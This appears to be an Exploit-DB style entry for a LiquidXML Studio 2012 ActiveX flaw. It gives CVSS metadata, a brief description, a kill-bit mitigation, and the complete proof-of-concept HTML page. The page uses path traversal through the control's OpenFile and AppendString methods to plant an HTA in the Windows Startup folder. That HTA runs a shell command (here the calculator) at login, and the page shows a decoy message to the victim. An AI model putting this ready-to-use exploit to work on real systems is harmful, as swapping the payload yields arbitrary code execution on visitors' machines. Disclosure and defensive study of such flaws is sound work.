LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day

vendor:

LiquidXML Studio 2012

by:

Dr_IDE

9,3

CVSS

HIGH

Insecure Method Executable File Creation

264

CWE

Product Name: LiquidXML Studio 2012

Affected Version From: LiquidXML Studio 2012

Affected Version To: LiquidXML Studio 2012

Patch Exists: No

Related CWE: N/A

CPE: a:liquid_technologies:liquid_xml_studio_2012

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2012

LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day

This exploit allows an attacker to create an executable file on the target system using the LiquidXML Studio 2012 ActiveX control. The exploit uses the OpenFile and AppendString methods of the ActiveX control to create a malicious HTA file in the startup folder of the target system. The malicious HTA file contains a script that executes the calculator application on the target system.

Mitigation:

Disable the LiquidXML Studio 2012 ActiveX control in the browser or set the kill bit for the control.

Source

Exploit-DB raw data:

<html>
<object classid='clsid:8AEEAB4A-E1DA-4354-B800-8F0B553770E1' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {8AEEAB4A-E1DA-4354-B800-8F0B553770E1}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Nothing to see here, you can close the browser now...
</body>
</html>